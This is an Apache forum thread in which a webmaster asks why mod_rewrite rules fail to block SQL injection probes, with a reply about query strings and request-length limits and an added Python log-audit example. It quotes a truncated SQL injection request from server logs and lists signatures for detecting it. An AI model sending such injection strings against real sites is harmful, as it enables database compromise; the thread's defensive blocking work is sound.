
Apache Web Server Forum

    
Mod Rewrite Rule Not Run
carfac




 
Msg#: 3739698 posted 3:29 pm on Sep 6, 2008 (gmt 0)

Hi Jim!

I have a mod rewrite rule in my httpd.conf I put in last night, and I checked this morning, and it is not being run. I read another post here on WebmasterWorld about sql injection scripts being run against servers- and I checked- and sure enough they were being run against me. So I figured I would do a quick rewrite to rewrite to my ban script (which I know works). I checked this morning, and the rewrite was NOT catching these. Here is a sample of one from my logs this morning:

69.248.109.#*$! - - [06/Sep/2008:03:19:33 -0600] "GET /Real/Path/On/My/Server/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766[...]%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 29085 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; SDR6; .NET CLR 2.0.50727)"

Here are the rewrites I put in:

RewriteRule DECLARE%20@ /banscript.cgi [PT,NC,L]
RewriteRule CHAR(4000) /banscript.cgi [PT,NC,L]
RewriteRule =CAST /banscript.cgi [PT,NC,L]

My initial feeling is that the "strange" characters ("%", "@", "(", ")" and "=") must need escaping... but I wanted them in because "declare" and "Cast" will make false positives by themselves. But it is also VERY possible I have just written bad rewrites!

So I thought I would check with the master!

Thanks!

Dave

[edited by: carfac at 3:32 pm (utc) on Sep. 6, 2008]

 

carfac




 
Msg#: 3739698 posted 3:31 pm on Sep 6, 2008 (gmt 0)

Oh, question two!

Is it possible to write a rewrite that will send to banscript.cgi if the request is longer than, say, 500 characters? As you can see, this is a long request- if I could ban requests greater than 500 characters, that might also work!

Dave

jdMorgan




 
Msg#: 3739698 posted 4:27 pm on Sep 6, 2008 (gmt 0)

You're trying to check the URL (using the RewriteRule), when the 'objectionable matter' is actually in the query string, and therefore not directly-visible to RewriteRule:

SQL injection blocking code example here: [webmasterworld.com...]

Request-length-based blocking:

# Block if request header is longer than 500 characters:
RewriteCond %{THE_REQUEST} ^.{255}.{245}

Note: This code snippet was taken off a live server, with the second character-count adjusted to 500 as you requested. It was evident that the maximum regex-supported character count must have been 255 per expression, which is why I had added a second expression as a work-around, raising the total here to 500.

Like many things, I don't know why this was necessary; It could be my particular servers' regex libraries, my versions of Apache, or something else specific to my servers, or it may be true for any Apache mod_rewrite install -- I don't know; I just tweaked the code to make it work, and then moved on.

Jim
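Added example, not part of the original thread: a log audit that separates the URL path (what a RewriteRule pattern is tested against) from the query string and the full request line, to show why the three rules above never fired and which served requests a query-string or length check would have caught. The sample log lines, the documentation-range IPs, the filler hex and all function names are constructed for illustration, and the path test is an approximation, since Apache matches against the decoded path.

```python
import re

# Combined Log Format: host ident user [time] "request line" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) ')

# Same three signatures as the thread's rules, with regex metacharacters escaped.
SIGNATURES = re.compile(r'DECLARE%20@|CHAR\(4000\)|=CAST\(', re.IGNORECASE)
MAX_REQUEST_LINE = 500  # threshold asked about in the thread


def classify(log_line):
    """Report which mod_rewrite test string would have matched one log entry."""
    m = LOG_RE.match(log_line)
    if not m:
        return None
    host, request_line, status = m.groups()
    parts = request_line.split(' ')
    target = parts[1] if len(parts) >= 2 else ''
    path, _, query = target.partition('?')
    return {
        'host': host,
        'status': int(status),
        'path_match': bool(SIGNATURES.search(path)),       # RewriteRule pattern
        'query_match': bool(SIGNATURES.search(query)),     # %{QUERY_STRING}
        'too_long': len(request_line) > MAX_REQUEST_LINE,  # %{THE_REQUEST}
    }


def missed_probes(lines):
    """Entries flagged by the query or length check that were still served 200."""
    results = (classify(line) for line in lines)
    return [r for r in results
            if r and r['status'] == 200 and (r['query_match'] or r['too_long'])]


# Constructed sample lines: filler hex stands in for the real payload.
_FILLER = '0x' + '41' * 260
SAMPLE = [
    '192.0.2.10 - - [06/Sep/2008:03:19:33 -0600] "GET /app/?;DECLARE%20@S%20'
    'CHAR(4000);SET%20@S=CAST(' + _FILLER + '%20AS%20CHAR(4000));EXEC(@S); '
    'HTTP/1.1" 200 29085 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [06/Sep/2008:03:20:01 -0600] '
    '"GET /declare-your-cast.html HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.12 - - [06/Sep/2008:03:21:07 -0600] '
    '"GET /search?q=cast+iron HTTP/1.1" 200 900 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    for hit in missed_probes(SAMPLE):
        print(hit)
```

Only the first sample line is reported: its path never matches, its query string does, and its request line exceeds 500 characters, while the two benign lines containing "declare" and "cast" are left alone.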

carfac




 
Msg#: 3739698 posted 5:00 pm on Sep 6, 2008 (gmt 0)

Jim:

You always put me in my place! :) Of course, you are correct. I SHOULD have realized that about the query string- DUH! Thanks for the help- I am sure I have this locked down now!

Dave

jdMorgan




 
Msg#: 3739698 posted 5:29 pm on Sep 6, 2008 (gmt 0)

> You always put me in my place!

That's a bit harsh! :)

Sorry, my factual tone and limited time for posting might come through that way, but it's not intentional.

Jim

carfac




 
Msg#: 3739698 posted 5:37 pm on Sep 6, 2008 (gmt 0)

>>> That's a bit harsh!

Sorry- not what I really intended. I meant you are the master, and I am a grasshopper!

I come here because I know you know this inside and out... and my attempts to do this are pathetic by comparison!

Sorry- I thought you would know what I meant, I worded it poorly. I kinda thought it looked weird when I wrote it- that is why I put the smilie there!
